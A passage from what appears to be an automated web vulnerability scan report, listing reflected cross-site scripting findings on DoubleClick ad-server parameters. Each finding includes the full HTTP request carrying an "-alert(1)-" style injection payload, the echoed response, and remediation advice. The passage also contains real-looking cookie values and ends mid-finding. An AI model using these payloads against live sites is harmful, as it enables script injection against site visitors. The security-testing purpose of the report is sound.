Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6885
Date: Fri, 25 Mar 2011 19:16:56 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Mar 2011 19:16:56 GMT
Cache-Control: private, x-gzip-ok=""

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
U6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-406387893378091293684"-alert(1)-"04063d9d42c&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

5.10. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78ad2"-alert(1)-"0cffce0ff89 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=178ad2"-alert(1)-"0cffce0ff89&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6885
Date: Fri, 25 Mar 2011 19:15:20 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Mar 2011 19:15:20 GMT
Cache-Control: private, x-gzip-ok=""

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
wMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=178ad2"-alert(1)-"0cffce0ff89&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...

5.11. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13934"-alert(1)-"2f40d37216e was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A13934"-alert(1)-"2f40d37216e&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6885
Date: Fri, 25 Mar 2011 19:16:11 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Mar 2011 19:16:11 GMT
Cache-Control: private, x-gzip-ok=""

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A13934"-alert(1)-"2f40d37216e&client=ca-pub-4063878933780912&adurl=http%3a%2f%2flearning.capella.edu/banners.aspx%3Frevkey%3D151364");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

5.12. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9c8a"-alert(1)-"74dc35f103c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5956.Google/B3941858.12;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=la9c8a"-alert(1)-"74dc35f103c&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRtuAIYyAKUpN0RqAMB0QNftM276KVd5OgDxwb1AwIAAMQ&num=1&sig=AGiWqtyxZvX1KKMfNg9J_efkBZftCuyf_A&client=ca-pub-4063878933780912&adurl=;ord=1246807419? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098441&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.soundingsonline.com_80.htm&dt=1301080440634&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080441371&frm=0&adk=1607234649&ga_vid=967180559.1301080441&ga_sid=1301080441&ga_hid=295407676&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=979&eid=44901217&fu=0&ifi=1&dtd=764&xpc=MMXNXDQ6lh&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6885
Date: Fri, 25 Mar 2011 19:13:57 GMT
Vary: Accept-Encoding
Expires: Fri, 25 Mar 2011 19:13:57 GMT
Cache-Control: private, x-gzip-ok=""

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Feb 10 14:47:14 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
l = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad5/f/18f/%2a/p%3B236512240%3B4-0%3B0%3B41471883%3B3454-728/90%3B40692123/40709910/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=la9c8a"-alert(1)-"74dc35f103c&ai=BuhlESOmMTaTqLsW6lQeZ4K2JCMy95NwB5MGbzhnAjbcBwMmjARABGAEgvs7lDTgAUOO0w5sGYMkGoAHw7Iz1A7oBCTcyOHg5MF9hc8gBCdoBQWZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL25ldHNwYXJrZXIvd3d3LnNvdW5kaW5nc29ubGluZS5jb21fODAuaHRt
...[SNIP]...

5.13. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a46e1"-alert(1)-"4aa4ff748f7 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a46e1"-alert(1)-"4aa4ff748f7&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:24 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:24 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a46e1"-alert(1)-"4aa4ff748f7&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3
...[SNIP]...

5.14. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9f72'-alert(1)-'29bf1bc4357 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a9f72'-alert(1)-'29bf1bc4357&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:28 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:28 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click%3Bh%3Dv8/3ad6/f/a6/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70a9f72'-alert(1)-'29bf1bc4357&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3
...[SNIP]...

5.15. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33655"-alert(1)-"02dc95746b was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=10966433655"-alert(1)-"02dc95746b&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6995
Date: Sat, 26 Mar 2011 01:38:15 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:15 GMT
Cache-Control: private, x-gzip-ok=""

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Dec 02 10:42:52 EST 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
eclick.net/click%3Bh%3Dv8/3ad6/f/a5/%2a/k%3B235630582%3B0-0%3B0%3B59396910%3B3454-728/90%3B39654880/39672667/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=10966433655"-alert(1)-"02dc95746b&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell
...[SNIP]...

5.16. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3 [mt_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N553.mediamath/B5123370.3

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7af1c'-alert(1)-'2429f82e180 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=1096647af1c'-alert(1)-'2429f82e180&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS81NDM5Mzc1MTA2NjM4MDM3OS8xMDk2NjQvMTAyMTY4LzQvcUNrUlV0a2tSODZTZllSNWtDMUZwcG5NelEyY2tlaWdSdTZMeEpRUzkyRS8/MpDSwvg5GdsMNZTleYApVCKa2Fo&price=TY1DWwAGmFoK5X_Ef7dLZSWZTQqUNqdlAdKhdw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOV_6W0ONTdqwGsT_lQfllt39B9zvj_EB5PW9vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFKaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLytOU0ZUVys_b3JkZXJpbmc9JnNlYXJjaHBocmFzZT1hbGyYAtQWwAIEyALWwYwOqAMB6APLA_UDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtx9q6AzNXuiMRPfKd7knjv7C82atQ%26client%3Dca-pub-5812731941170583%26adurl%3D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6999
Date: Sat, 26 Mar 2011 01:38:20 GMT
Vary: Accept-Encoding
Expires: Sat, 26 Mar 2011 01:38:20 GMT
Cache-Control: private, x-gzip-ok=""

